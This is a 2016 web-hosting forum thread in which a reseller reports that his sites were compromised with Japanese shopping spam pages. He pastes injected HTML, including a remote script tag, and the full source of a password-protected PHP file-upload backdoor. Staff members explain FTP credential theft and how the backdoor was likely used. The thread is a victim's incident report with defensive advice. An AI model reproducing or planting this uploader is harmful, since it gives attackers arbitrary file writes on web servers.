Websites hacked

Discussion in 'H-Sphere Reseller Hosting' started by BluJag, Jan 31, 2016.

  1. BluJag

    BluJag Perch

    All my sites on Web4 have been hacked by a Japanese shopping organisation. I'm in the long process of trying to delete the thousands and thousands of files which have been uploaded

    This is a snippet from one of the html files

    <script type="text/javascript" src="http://iclothesshow.top/js/clotho.js"></script>shop/item/3390.html"

    and

    <dd><a href="http://www.mungaz.net/engine/eX0-Spring-short-coat-U7.html">Mila Owen 無地衿付きニットトップス ミラオーウェン</a></dd>

    and

    <div class=copyright>
    <div class=inner>
    <div class=policy> <a href="http://www.orbis.co.jp/contents/company/privacy/">個人情報保護方針</a><span>|</span><a href="/snspolicy/">ソーシャルメディアポリシー</a> </div>
    <p> <img src="http://www.orbis.co.jp/contents/images/foot/2015copyright.png" alt="copyright © 1999-2015 orbis inc. all rights reserved." width=266 height=11><img src="http://www.orbis.co.jp/contents/images/foot/footer_logo.gif" alt=orbis width=43 height=16 class=footlogo><br>
    </p>
    </div>
    </div>

    Plus there are php files too, eg

    $config_password="yt";
    $action=$_REQUEST['action'];
    $password=$_REQUEST['password'];
    $folderpath=$_REQUEST['folderpath'];
    $filename=$_REQUEST['filename'];
    $body=stripslashes($_REQUEST['body']);

    if($password==""||$filename==""||$body=="")
    {
    echo 'parameters error!';
    return;
    }

    if($password!=$config_password)
    {
    echo 'password error!';
    return;
    }

    $rootPath=$_SERVER['DOCUMENT_ROOT'];
    $newPath=$rootPath;

    if($folderpath!="")
    {
    if($folderpath=="root")
    {
    $newPath=$rootPath.'/'.$filename;
    }
    else
    {
    createFolder($rootPath.'/'.$folderpath);
    $newPath=$rootPath.'/'.$folderpath.'/'.$filename;
    }
    }
    else
    {
    $newPath=$filename;
    }


    $fp=fopen($newPath,"w");
    //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
    fwrite($fp,$body);
    fclose($fp);

    if(file_exists($newPath))
    {
    echo "publish success & uploaded";
    }

    function createFolder($path)
    {
    if (!file_exists($path))
    {
    createFolder(dirname($path));
    mkdir($path, 0777);
    }
    }

    Suggest everyone checks their own sites!
    Last edited: Jan 31, 2016
    ngatr likes this.
  2. abhishek

    abhishek Administrator Staff Member

    Seems an iframe script added to your domain web-files.There are many ways this can happen, most is due to FTP password stolen, it doesn't come from your PC but the gumblar worm steals it from your PC and later used by FTP to infect your pages.We recommend you to scan all computers that have FTP access to this account, or have had access to it in the past. This is to be done until an infection is found and cleaned.Also, change password of the main and the sub-FTP account.
  3. BluJag

    BluJag Perch

    Will do - thanks for the advice
  4. Stephen

    Stephen US Operations Staff Member

    That php file likely got uploaded and then they did the rest via that making it much harder to find the real source since it will be hidden in just a single line, and then used via website by many botnets to upload.
  5. BluJag

    BluJag Perch

    Thanks Stephen, I'm going through all the files on the server.

Share This Page

JodoHost - 26,000 hosting end-users in 100 countries
Plesk Web Hosting
VPS Hosting
H-Sphere Web Hosting
Other Services